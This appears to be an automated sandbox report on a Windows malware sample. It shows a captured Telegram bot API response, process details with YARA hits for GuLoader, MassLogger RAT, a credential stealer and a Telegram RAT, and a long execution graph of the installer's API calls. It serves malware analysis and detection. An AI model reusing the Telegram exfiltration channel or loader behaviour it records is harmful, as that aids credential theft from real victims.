                                                                                                        2025-01-10 18:57:39 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44639,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535459,"document":{"file_name":"U


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:13:55:28
                                                                                                        Start date:10/01/2025
                                                                                                        Path:C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\m0CZ8H4jfl.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:432'979 bytes
                                                                                                        MD5 hash:AD29D6168ABBEC988896C57D4D25E2ED
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1793597999.0000000004978000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:13:56:10
                                                                                                        Start date:10/01/2025
                                                                                                        Path:C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\m0CZ8H4jfl.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:432'979 bytes
                                                                                                        MD5 hash:AD29D6168ABBEC988896C57D4D25E2ED
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2660261583.000000003481B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2635144470.0000000003638000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:false

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:21.2%
                                                                                                          Dynamic/Decrypted Code Coverage:13.7%
                                                                                                          Signature Coverage:25.2%
                                                                                                          Total number of Nodes:1507
                                                                                                          Total number of Limit Nodes:46
                                                                                                          execution_graph 4768 401cc0 4769 402ba2 18 API calls 4768->4769 4770 401cc7 4769->4770 4771 402ba2 18 API calls 4770->4771 4772 401ccf GetDlgItem 4771->4772 4773 402531 4772->4773 4774 4029c0 4775 402ba2 18 API calls 4774->4775 4776 4029c6 4775->4776 4777 4029f9 4776->4777 4779 40281e 4776->4779 4780 4029d4 4776->4780 4778 406077 18 API calls 4777->4778 4777->4779 4778->4779 4780->4779 4782 405f9c wsprintfW 4780->4782 4782->4779 4190 403c41 4191 403d94 4190->4191 4192 403c59 4190->4192 4194 403de5 4191->4194 4195 403da5 GetDlgItem GetDlgItem 4191->4195 4192->4191 4193 403c65 4192->4193 4196 403c70 SetWindowPos 4193->4196 4197 403c83 4193->4197 4199 403e3f 4194->4199 4208 401389 2 API calls 4194->4208 4198 404119 19 API calls 4195->4198 4196->4197 4201 403ca0 4197->4201 4202 403c88 ShowWindow 4197->4202 4203 403dcf SetClassLongW 4198->4203 4200 404165 SendMessageW 4199->4200 4204 403d8f 4199->4204 4231 403e51 4200->4231 4205 403cc2 4201->4205 4206 403ca8 DestroyWindow 4201->4206 4202->4201 4207 40140b 2 API calls 4203->4207 4210 403cc7 SetWindowLongW 4205->4210 4211 403cd8 4205->4211 4209 4040c3 4206->4209 4207->4194 4212 403e17 4208->4212 4209->4204 4219 4040d3 ShowWindow 4209->4219 4210->4204 4215 403d81 4211->4215 4216 403ce4 GetDlgItem 4211->4216 4212->4199 4217 403e1b SendMessageW 4212->4217 4213 40140b 2 API calls 4213->4231 4214 4040a4 DestroyWindow EndDialog 4214->4209 4270 404180 4215->4270 4220 403d14 4216->4220 4221 403cf7 SendMessageW IsWindowEnabled 4216->4221 4217->4204 4219->4204 4223 403d21 4220->4223 4224 403d68 SendMessageW 4220->4224 4225 403d34 4220->4225 4234 403d19 4220->4234 4221->4204 4221->4220 4222 406077 18 API calls 4222->4231 4223->4224 4223->4234 4224->4215 4228 403d51 4225->4228 4229 403d3c 4225->4229 4227 404119 19 API calls 4227->4231 4233 40140b 2 API calls 4228->4233 4232 40140b 2 API calls 4229->4232 4230 403d4f 4230->4215 4231->4204 4231->4213 4231->4214 4231->4222 4231->4227 4251 403fe4 DestroyWindow 4231->4251 4261 404119 4231->4261 4232->4234 4235 403d58 4233->4235 4267 4040f2 4234->4267 4235->4215 4235->4234 4237 403ecc GetDlgItem 4238 403ee1 4237->4238 4239 403ee9 ShowWindow KiUserCallbackDispatcher 4237->4239 4238->4239 4264 40413b EnableWindow 4239->4264 4241 403f13 EnableWindow 4244 403f27 4241->4244 4242 403f2c GetSystemMenu EnableMenuItem SendMessageW 4243 403f5c SendMessageW 4242->4243 4242->4244 4243->4244 4244->4242 4265 40414e SendMessageW 4244->4265 4266 406055 lstrcpynW 4244->4266 4247 403f8a lstrlenW 4248 406077 18 API calls 4247->4248 4249 403fa0 SetWindowTextW 4248->4249 4250 401389 2 API calls 4249->4250 4250->4231 4251->4209 4252 403ffe CreateDialogParamW 4251->4252 4252->4209 4253 404031 4252->4253 4254 404119 19 API calls 4253->4254 4255 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4254->4255 4256 401389 2 API calls 4255->4256 4257 404082 4256->4257 4257->4204 4258 40408a ShowWindow 4257->4258 4259 404165 SendMessageW 4258->4259 4260 4040a2 4259->4260 4260->4209 4262 406077 18 API calls 4261->4262 4263 404124 SetDlgItemTextW 4262->4263 4263->4237 4264->4241 4265->4244 4266->4247 4268 4040f9 4267->4268 4269 4040ff SendMessageW 4267->4269 4268->4269 4269->4230 4271 404221 4270->4271 4272 404198 GetWindowLongW 4270->4272 4271->4204 4272->4271 4273 4041a9 4272->4273 4274 4041b8 GetSysColor 4273->4274 4275 4041bb 4273->4275 4274->4275 4276 4041c1 SetTextColor 4275->4276 4277 4041cb SetBkMode 4275->4277 4276->4277 4278 4041e3 GetSysColor 4277->4278 4279 4041e9 4277->4279 4278->4279 4280 4041f0 SetBkColor 4279->4280 4281 4041fa 4279->4281 4280->4281 4281->4271 4282 404214 CreateBrushIndirect 4281->4282 4283 40420d DeleteObject 4281->4283 4282->4271 4283->4282 4284 401fc3 4285 401fd5 4284->4285 4295 402087 4284->4295 4307 402bbf 4285->4307 4287 401423 25 API calls 4293 4021e1 4287->4293 4289 402bbf 18 API calls 4290 401fe5 4289->4290 4291 401ffb LoadLibraryExW 4290->4291 4292 401fed GetModuleHandleW 4290->4292 4294 40200c 4291->4294 4291->4295 4292->4291 4292->4294 4313 40649a WideCharToMultiByte 4294->4313 4295->4287 4298 402056 4300 4051b4 25 API calls 4298->4300 4299 40201d 4301 402025 4299->4301 4302 40203c 4299->4302 4303 40202d 4300->4303 4358 401423 4301->4358 4316 10001759 4302->4316 4303->4293 4305 402079 FreeLibrary 4303->4305 4305->4293 4308 402bcb 4307->4308 4309 406077 18 API calls 4308->4309 4310 402bec 4309->4310 4311 401fdc 4310->4311 4312 4062e9 5 API calls 4310->4312 4311->4289 4312->4311 4314 4064c4 GetProcAddress 4313->4314 4315 402017 4313->4315 4314->4315 4315->4298 4315->4299 4317 10001789 4316->4317 4361 10001b18 4317->4361 4319 10001790 4320 100018a6 4319->4320 4321 100017a1 4319->4321 4322 100017a8 4319->4322 4320->4303 4410 10002286 4321->4410 4393 100022d0 4322->4393 4327 1000180c 4333 10001812 4327->4333 4334 1000184e 4327->4334 4328 100017ee 4423 100024a9 4328->4423 4329 100017d7 4341 100017cd 4329->4341 4420 10002b5f 4329->4420 4330 100017be 4332 100017c4 4330->4332 4338 100017cf 4330->4338 4332->4341 4404 100028a4 4332->4404 4340 100015b4 2 API calls 4333->4340 4336 100024a9 10 API calls 4334->4336 4342 10001840 4336->4342 4337 100017f4 4434 100015b4 4337->4434 4414 10002645 4338->4414 4345 10001828 4340->4345 4341->4327 4341->4328 4349 10001895 4342->4349 4442 1000246c 4342->4442 4346 100024a9 10 API calls 4345->4346 4346->4342 4348 100017d5 4348->4341 4349->4320 4351 1000189f GlobalFree 4349->4351 4351->4320 4355 10001881 4355->4349 4446 1000153d 4355->4446 4356 1000187a FreeLibrary 4356->4355 4359 4051b4 25 API calls 4358->4359 4360 401431 4359->4360 4360->4303 4450 1000121b GlobalAlloc 4361->4450 4363 10001b3c 4451 1000121b GlobalAlloc 4363->4451 4365 10001d7a GlobalFree GlobalFree GlobalFree 4366 10001d97 4365->4366 4381 10001de1 4365->4381 4367 100020ee 4366->4367 4376 10001dac 4366->4376 4366->4381 4369 10002110 GetModuleHandleW 4367->4369 4367->4381 4368 10001c1d GlobalAlloc 4388 10001b47 4368->4388 4372 10002121 LoadLibraryW 4369->4372 4373 10002136 4369->4373 4370 10001c68 lstrcpyW 4374 10001c72 lstrcpyW 4370->4374 4371 10001c86 GlobalFree 4371->4388 4372->4373 4372->4381 4458 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4373->4458 4374->4388 4376->4381 4454 1000122c 4376->4454 4377 10002048 4377->4381 4385 10002090 lstrcpyW 4377->4385 4378 10002188 4380 10002195 lstrlenW 4378->4380 4378->4381 4459 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4380->4459 4381->4319 4382 10002148 4382->4378 4392 10002172 GetProcAddress 4382->4392 4385->4381 4386 10001cc4 4386->4388 4452 1000158f GlobalSize GlobalAlloc 4386->4452 4387 10001f37 GlobalFree 4387->4388 4388->4365 4388->4368 4388->4370 4388->4371 4388->4374 4388->4377 4388->4381 4388->4386 4388->4387 4390 1000122c 2 API calls 4388->4390 4457 1000121b GlobalAlloc 4388->4457 4389 100021af 4389->4381 4390->4388 4392->4378 4401 100022e8 4393->4401 4394 1000122c GlobalAlloc lstrcpynW 4394->4401 4396 10002415 GlobalFree 4397 100017ae 4396->4397 4396->4401 4397->4329 4397->4330 4397->4341 4398 100023d3 lstrlenW 4398->4396 4403 100023de 4398->4403 4399 100023ba GlobalAlloc CLSIDFromString 4399->4396 4400 1000238f GlobalAlloc WideCharToMultiByte 4400->4396 4401->4394 4401->4396 4401->4398 4401->4399 4401->4400 4461 100012ba 4401->4461 4403->4396 4465 100025d9 4403->4465 4406 100028b6 4404->4406 4405 1000295b SetFilePointer 4407 10002979 4405->4407 4406->4405 4408 10002a75 4407->4408 4409 10002a6a GetLastError 4407->4409 4408->4341 4409->4408 4411 10002296 4410->4411 4412 100017a7 4410->4412 4411->4412 4413 100022a8 GlobalAlloc 4411->4413 4412->4322 4413->4411 4418 10002661 4414->4418 4415 100026b2 GlobalAlloc 4419 100026d4 4415->4419 4416 100026c5 4417 100026ca GlobalSize 4416->4417 4416->4419 4417->4419 4418->4415 4418->4416 4419->4348 4422 10002b6a 4420->4422 4421 10002baa GlobalFree 4422->4421 4468 1000121b GlobalAlloc 4423->4468 4425 10002530 StringFromGUID2 4430 100024b3 4425->4430 4426 10002541 lstrcpynW 4426->4430 4427 1000250b MultiByteToWideChar 4427->4430 4428 10002554 wsprintfW 4428->4430 4429 10002571 GlobalFree 4429->4430 4430->4425 4430->4426 4430->4427 4430->4428 4430->4429 4431 100025ac GlobalFree 4430->4431 4432 10001272 2 API calls 4430->4432 4469 100012e1 4430->4469 4431->4337 4432->4430 4473 1000121b GlobalAlloc 4434->4473 4436 100015ba 4437 100015cc lstrcpyW 4436->4437 4438 100015e1 4436->4438 4437->4438 4439 10001272 4438->4439 4440 100012b5 GlobalFree 4439->4440 4441 1000127b GlobalAlloc lstrcpynW 4439->4441 4440->4342 4441->4440 4443 10001861 4442->4443 4444 1000247a 4442->4444 4443->4355 4443->4356 4444->4443 4445 10002496 GlobalFree 4444->4445 4445->4444 4447 10001555 4446->4447 4448 10001272 2 API calls 4447->4448 4449 1000155e 4448->4449 4449->4349 4450->4363 4451->4388 4453 100015ad 4452->4453 4453->4386 4460 1000121b GlobalAlloc 4454->4460 4456 1000123b lstrcpynW 4456->4381 4457->4388 4458->4382 4459->4389 4460->4456 4462 100012c1 4461->4462 4463 1000122c 2 API calls 4462->4463 4464 100012df 4463->4464 4464->4401 4466 100025e7 VirtualAlloc 4465->4466 4467 1000263d 4465->4467 4466->4467 4467->4403 4468->4430 4470 100012ea 4469->4470 4471 1000130c 4469->4471 4470->4471 4472 100012f0 lstrcpyW 4470->4472 4471->4430 4472->4471 4473->4436 4783 4016c4 4784 402bbf 18 API calls 4783->4784 4785 4016ca GetFullPathNameW 4784->4785 4786 4016e4 4785->4786 4792 401706 4785->4792 4788 406398 2 API calls 4786->4788 4786->4792 4787 40171b GetShortPathNameW 4789 402a4c 4787->4789 4790 4016f6 4788->4790 4790->4792 4793 406055 lstrcpynW 4790->4793 4792->4787 4792->4789 4793->4792 4794 4014cb 4795 4051b4 25 API calls 4794->4795 4796 4014d2 4795->4796 4797 40194e 4798 402bbf 18 API calls 4797->4798 4799 401955 lstrlenW 4798->4799 4800 402531 4799->4800 4801 4027ce 4802 4027d6 4801->4802 4803 4027da FindNextFileW 4802->4803 4805 4027ec 4802->4805 4804 402833 4803->4804 4803->4805 4807 406055 lstrcpynW 4804->4807 4807->4805 4671 401754 4672 402bbf 18 API calls 4671->4672 4673 40175b 4672->4673 4674 405c59 2 API calls 4673->4674 4675 401762 4674->4675 4676 405c59 2 API calls 4675->4676 4676->4675 4808 401d56 GetDC GetDeviceCaps 4809 402ba2 18 API calls 4808->4809 4810 401d74 MulDiv ReleaseDC 4809->4810 4811 402ba2 18 API calls 4810->4811 4812 401d93 4811->4812 4813 406077 18 API calls 4812->4813 4814 401dcc CreateFontIndirectW 4813->4814 4815 402531 4814->4815 4816 401a57 4817 402ba2 18 API calls 4816->4817 4818 401a5d 4817->4818 4819 402ba2 18 API calls 4818->4819 4820 401a05 4819->4820 4821 4014d7 4822 402ba2 18 API calls 4821->4822 4823 4014dd Sleep 4822->4823 4825 402a4c 4823->4825 4826 40155b 4827 4029f2 4826->4827 4830 405f9c wsprintfW 4827->4830 4829 4029f7 4830->4829 4750 401ddc 4751 402ba2 18 API calls 4750->4751 4752 401de2 4751->4752 4753 402ba2 18 API calls 4752->4753 4754 401deb 4753->4754 4755 401df2 ShowWindow 4754->4755 4756 401dfd EnableWindow 4754->4756 4757 402a4c 4755->4757 4756->4757 4831 40385c 4832 403867 4831->4832 4833 40386b 4832->4833 4834 40386e GlobalAlloc 4832->4834 4834->4833 4835 4022df 4836 402bbf 18 API calls 4835->4836 4837 4022ee 4836->4837 4838 402bbf 18 API calls 4837->4838 4839 4022f7 4838->4839 4840 402bbf 18 API calls 4839->4840 4841 402301 GetPrivateProfileStringW 4840->4841 4842 401bdf 4843 402ba2 18 API calls 4842->4843 4844 401be6 4843->4844 4845 402ba2 18 API calls 4844->4845 4846 401bf0 4845->4846 4847 401c00 4846->4847 4848 402bbf 18 API calls 4846->4848 4849 401c10 4847->4849 4850 402bbf 18 API calls 4847->4850 4848->4847 4851 401c1b 4849->4851 4852 401c5f 4849->4852 4850->4849 4854 402ba2 18 API calls 4851->4854 4853 402bbf 18 API calls 4852->4853 4856 401c64 4853->4856 4855 401c20 4854->4855 4857 402ba2 18 API calls 4855->4857 4858 402bbf 18 API calls 4856->4858 4859 401c29 4857->4859 4860 401c6d FindWindowExW 4858->4860 4861 401c31 SendMessageTimeoutW 4859->4861 4862 401c4f SendMessageW 4859->4862 4863 401c8f 4860->4863 4861->4863 4862->4863 4864 401960 4865 402ba2 18 API calls 4864->4865 4866 401967 4865->4866 4867 402ba2 18 API calls 4866->4867 4868 401971 4867->4868 4869 402bbf 18 API calls 4868->4869 4870 40197a 4869->4870 4871 40198e lstrlenW 4870->4871 4873 4019ca 4870->4873 4872 401998 4871->4872 4872->4873 4877 406055 lstrcpynW 4872->4877 4875 4019b3 4875->4873 4876 4019c0 lstrlenW 4875->4876 4876->4873 4877->4875 4878 401662 4879 402bbf 18 API calls 4878->4879 4880 401668 4879->4880 4881 406398 2 API calls 4880->4881 4882 40166e 4881->4882 4883 4019e4 4884 402bbf 18 API calls 4883->4884 4885 4019eb 4884->4885 4886 402bbf 18 API calls 4885->4886 4887 4019f4 4886->4887 4888 4019fb lstrcmpiW 4887->4888 4889 401a0d lstrcmpW 4887->4889 4890 401a01 4888->4890 4889->4890 4474 4025e5 4488 402ba2 4474->4488 4476 4025f4 4477 40263a ReadFile 4476->4477 4478 4026d3 4476->4478 4479 405cad ReadFile 4476->4479 4480 40267a MultiByteToWideChar 4476->4480 4481 40272f 4476->4481 4484 4026a0 SetFilePointer MultiByteToWideChar 4476->4484 4485 402740 4476->4485 4487 40272d 4476->4487 4477->4476 4477->4487 4478->4476 4478->4487 4491 405d0b SetFilePointer 4478->4491 4479->4476 4480->4476 4500 405f9c wsprintfW 4481->4500 4484->4476 4486 402761 SetFilePointer 4485->4486 4485->4487 4486->4487 4489 406077 18 API calls 4488->4489 4490 402bb6 4489->4490 4490->4476 4492 405d27 4491->4492 4499 405d43 4491->4499 4493 405cad ReadFile 4492->4493 4494 405d33 4493->4494 4495 405d74 SetFilePointer 4494->4495 4496 405d4c SetFilePointer 4494->4496 4494->4499 4495->4499 4496->4495 4497 405d57 4496->4497 4498 405cdc WriteFile 4497->4498 4498->4499 4499->4478 4500->4487 4891 401e66 4892 402bbf 18 API calls 4891->4892 4893 401e6c 4892->4893 4894 4051b4 25 API calls 4893->4894 4895 401e76 4894->4895 4896 405735 2 API calls 4895->4896 4897 401e7c 4896->4897 4898 401edb CloseHandle 4897->4898 4899 401e8c WaitForSingleObject 4897->4899 4900 40281e 4897->4900 4898->4900 4902 401e9e 4899->4902 4901 401eb0 GetExitCodeProcess 4904 401ec2 4901->4904 4905 401ecd 4901->4905 4902->4901 4903 406467 2 API calls 4902->4903 4907 401ea5 WaitForSingleObject 4903->4907 4908 405f9c wsprintfW 4904->4908 4905->4898 4907->4902 4908->4905 4510 401767 4511 402bbf 18 API calls 4510->4511 4512 40176e 4511->4512 4513 401796 4512->4513 4514 40178e 4512->4514 4551 406055 lstrcpynW 4513->4551 4550 406055 lstrcpynW 4514->4550 4517 401794 4521 4062e9 5 API calls 4517->4521 4518 4017a1 4519 405a09 3 API calls 4518->4519 4520 4017a7 lstrcatW 4519->4520 4520->4517 4532 4017b3 4521->4532 4522 406398 2 API calls 4522->4532 4523 4017ef 4524 405c05 2 API calls 4523->4524 4524->4532 4526 4017c5 CompareFileTime 4526->4532 4527 401885 4528 4051b4 25 API calls 4527->4528 4531 40188f 4528->4531 4529 4051b4 25 API calls 4539 401871 4529->4539 4530 406055 lstrcpynW 4530->4532 4533 403027 32 API calls 4531->4533 4532->4522 4532->4523 4532->4526 4532->4527 4532->4530 4536 406077 18 API calls 4532->4536 4546 40579a MessageBoxIndirectW 4532->4546 4547 40185c 4532->4547 4549 405c2a GetFileAttributesW CreateFileW 4532->4549 4534 4018a2 4533->4534 4535 4018b6 SetFileTime 4534->4535 4537 4018c8 CloseHandle 4534->4537 4535->4537 4536->4532 4538 4018d9 4537->4538 4537->4539 4540 4018f1 4538->4540 4541 4018de 4538->4541 4543 406077 18 API calls 4540->4543 4542 406077 18 API calls 4541->4542 4544 4018e6 lstrcatW 4542->4544 4545 4018f9 4543->4545 4544->4545 4548 40579a MessageBoxIndirectW 4545->4548 4546->4532 4547->4529 4547->4539 4548->4539 4549->4532 4550->4517 4551->4518 4909 404267 lstrlenW 4910 404286 4909->4910 4911 404288 WideCharToMultiByte 4909->4911 4910->4911 4912 100018a9 4913 100018cc 4912->4913 4914 100018ff GlobalFree 4913->4914 4915 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4913->4915 4914->4915 4916 10001272 2 API calls 4915->4916 4917 10001a87 GlobalFree GlobalFree 4916->4917 4918 401ee9 4919 402bbf 18 API calls 4918->4919 4920 401ef0 4919->4920 4921 406398 2 API calls 4920->4921 4922 401ef6 4921->4922 4924 401f07 4922->4924 4925 405f9c wsprintfW 4922->4925 4925->4924 4926 4021ea 4927 402bbf 18 API calls 4926->4927 4928 4021f0 4927->4928 4929 402bbf 18 API calls 4928->4929 4930 4021f9 4929->4930 4931 402bbf 18 API calls 4930->4931 4932 402202 4931->4932 4933 406398 2 API calls 4932->4933 4934 40220b 4933->4934 4935 40221c lstrlenW lstrlenW 4934->4935 4939 40220f 4934->4939 4937 4051b4 25 API calls 4935->4937 4936 4051b4 25 API calls 4940 402217 4936->4940 4938 40225a SHFileOperationW 4937->4938 4938->4939 4938->4940 4939->4936 4939->4940 4941 40156b 4942 401584 4941->4942 4943 40157b ShowWindow 4941->4943 4944 401592 ShowWindow 4942->4944 4945 402a4c 4942->4945 4943->4942 4944->4945 4946 40456d 4947 4045a3 4946->4947 4948 40457d 4946->4948 4950 404180 8 API calls 4947->4950 4949 404119 19 API calls 4948->4949 4951 40458a SetDlgItemTextW 4949->4951 4952 4045af 4950->4952 4951->4947 4953 40226e 4954 402288 4953->4954 4955 402275 4953->4955 4956 406077 18 API calls 4955->4956 4957 402282 4956->4957 4958 40579a MessageBoxIndirectW 4957->4958 4958->4954 4959 402870 4981 405c2a GetFileAttributesW CreateFileW 4959->4981 4961 402877 4962 402883 GlobalAlloc 4961->4962 4963 40291a 4961->4963 4964 402911 CloseHandle 4962->4964 4965 40289c 4962->4965 4966 402922 DeleteFileW 4963->4966 4967 402935 4963->4967 4964->4963 4982 403258 SetFilePointer 4965->4982 4966->4967 4969 4028a2 4970 403242 ReadFile 4969->4970 4971 4028ab GlobalAlloc 4970->4971 4972 4028bb 4971->4972 4973 4028ef 4971->4973 4974 403027 32 API calls 4972->4974 4975 405cdc WriteFile 4973->4975 4980 4028c8 4974->4980 4976 4028fb GlobalFree 4975->4976 4977 403027 32 API calls 4976->4977 4978 40290e 4977->4978 4978->4964 4979 4028e6 GlobalFree 4979->4973 4980->4979 4981->4961 4982->4969 4983 4014f1 SetForegroundWindow 4984 402a4c 4983->4984 4985 401673 4986 402bbf 18 API calls 4985->4986 4987 40167a 4986->4987 4988 402bbf 18 API calls 4987->4988 4989 401683 4988->4989 4990 402bbf 18 API calls 4989->4990 4991 40168c MoveFileW 4990->4991 4992 40169f 4991->4992 4998 401698 4991->4998 4993 406398 2 API calls 4992->4993 4996 4021e1 4992->4996 4995 4016ae 4993->4995 4994 401423 25 API calls 4994->4996 4995->4996 4997 405ef6 38 API calls 4995->4997 4997->4998 4998->4994 4999 4052f3 5000 405314 GetDlgItem GetDlgItem GetDlgItem 4999->5000 5001 40549d 4999->5001 5044 40414e SendMessageW 5000->5044 5003 4054a6 GetDlgItem CreateThread CloseHandle 5001->5003 5004 4054ce 5001->5004 5003->5004 5006 4054f9 5004->5006 5007 4054e5 ShowWindow ShowWindow 5004->5007 5008 40551e 5004->5008 5005 405384 5010 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5005->5010 5009 405559 5006->5009 5012 405533 ShowWindow 5006->5012 5013 40550d 5006->5013 5046 40414e SendMessageW 5007->5046 5014 404180 8 API calls 5008->5014 5009->5008 5017 405567 SendMessageW 5009->5017 5015 4053f9 5010->5015 5016 4053dd SendMessageW SendMessageW 5010->5016 5019 405553 5012->5019 5020 405545 5012->5020 5018 4040f2 SendMessageW 5013->5018 5026 40552c 5014->5026 5023 40540c 5015->5023 5024 4053fe SendMessageW 5015->5024 5016->5015 5025 405580 CreatePopupMenu 5017->5025 5017->5026 5018->5008 5022 4040f2 SendMessageW 5019->5022 5021 4051b4 25 API calls 5020->5021 5021->5019 5022->5009 5028 404119 19 API calls 5023->5028 5024->5023 5027 406077 18 API calls 5025->5027 5029 405590 AppendMenuW 5027->5029 5030 40541c 5028->5030 5031 4055c0 TrackPopupMenu 5029->5031 5032 4055ad GetWindowRect 5029->5032 5033 405425 ShowWindow 5030->5033 5034 405459 GetDlgItem SendMessageW 5030->5034 5031->5026 5036 4055db 5031->5036 5032->5031 5037 405448 5033->5037 5038 40543b ShowWindow 5033->5038 5034->5026 5035 405480 SendMessageW SendMessageW 5034->5035 5035->5026 5039 4055f7 SendMessageW 5036->5039 5045 40414e SendMessageW 5037->5045 5038->5037 5039->5039 5040 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5039->5040 5042 405639 SendMessageW 5040->5042 5042->5042 5043 405662 GlobalUnlock SetClipboardData CloseClipboard 5042->5043 5043->5026 5044->5005 5045->5034 5046->5006 5047 100016b6 5048 100016e5 5047->5048 5049 10001b18 22 API calls 5048->5049 5050 100016ec 5049->5050 5051 100016f3 5050->5051 5052 100016ff 5050->5052 5053 10001272 2 API calls 5051->5053 5054 10001726 5052->5054 5055 10001709 5052->5055 5058 100016fd 5053->5058 5056 10001750 5054->5056 5057 1000172c 5054->5057 5059 1000153d 2 API calls 5055->5059 5061 1000153d 2 API calls 5056->5061 5060 100015b4 2 API calls 5057->5060 5062 1000170e 5059->5062 5063 10001731 5060->5063 5061->5058 5064 100015b4 2 API calls 5062->5064 5065 10001272 2 API calls 5063->5065 5066 10001714 5064->5066 5067 10001737 GlobalFree 5065->5067 5068 10001272 2 API calls 5066->5068 5067->5058 5070 1000174b GlobalFree 5067->5070 5069 1000171a GlobalFree 5068->5069 5069->5058 5070->5058 5071 10002238 5072 10002296 5071->5072 5073 100022cc 5071->5073 5072->5073 5074 100022a8 GlobalAlloc 5072->5074 5074->5072 5075 401cfa GetDlgItem GetClientRect 5076 402bbf 18 API calls 5075->5076 5077 401d2c LoadImageW SendMessageW 5076->5077 5078 401d4a DeleteObject 5077->5078 5079 402a4c 5077->5079 5078->5079 4719 4027fb 4720 402bbf 18 API calls 4719->4720 4721 402802 FindFirstFileW 4720->4721 4722 402815 4721->4722 4723 40282a 4721->4723 4724 402833 4723->4724 4727 405f9c wsprintfW 4723->4727 4728 406055 lstrcpynW 4724->4728 4727->4724 4728->4722 4729 40237b 4730 402381 4729->4730 4731 402bbf 18 API calls 4730->4731 4732 402393 4731->4732 4733 402bbf 18 API calls 4732->4733 4734 40239d RegCreateKeyExW 4733->4734 4735 4023c7 4734->4735 4736 40281e 4734->4736 4737 4023e2 4735->4737 4738 402bbf 18 API calls 4735->4738 4739 4023ee 4737->4739 4741 402ba2 18 API calls 4737->4741 4740 4023d8 lstrlenW 4738->4740 4742 402409 RegSetValueExW 4739->4742 4743 403027 32 API calls 4739->4743 4740->4737 4741->4739 4744 40241f RegCloseKey 4742->4744 4743->4742 4744->4736 5080 1000103d 5083 1000101b 5080->5083 5090 10001516 5083->5090 5085 10001020 5086 10001024 5085->5086 5087 10001027 GlobalAlloc 5085->5087 5088 1000153d 2 API calls 5086->5088 5087->5086 5089 1000103b 5088->5089 5092 1000151c 5090->5092 5091 10001522 5091->5085 5092->5091 5093 1000152e GlobalFree 5092->5093 5093->5085 5094 4014ff 5095 401507 5094->5095 5097 40151a 5094->5097 5096 402ba2 18 API calls 5095->5096 5096->5097 5098 401000 5099 401037 BeginPaint GetClientRect 5098->5099 5100 40100c DefWindowProcW 5098->5100 5101 4010f3 5099->5101 5103 401179 5100->5103 5104 401073 CreateBrushIndirect FillRect DeleteObject 5101->5104 5105 4010fc 5101->5105 5104->5101 5106 401102 CreateFontIndirectW 5105->5106 5107 401167 EndPaint 5105->5107 5106->5107 5108 401112 6 API calls 5106->5108 5107->5103 5108->5107 5109 401904 5110 40193b 5109->5110 5111 402bbf 18 API calls 5110->5111 5112 401940 5111->5112 5113 405846 69 API calls 5112->5113 5114 401949 5113->5114 5115 402d04 5116 402d16 SetTimer 5115->5116 5117 402d2f 5115->5117 5116->5117 5118 402d84 5117->5118 5119 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5117->5119 5119->5118 4501 402786 4502 40278d 4501->4502 4505 4029f7 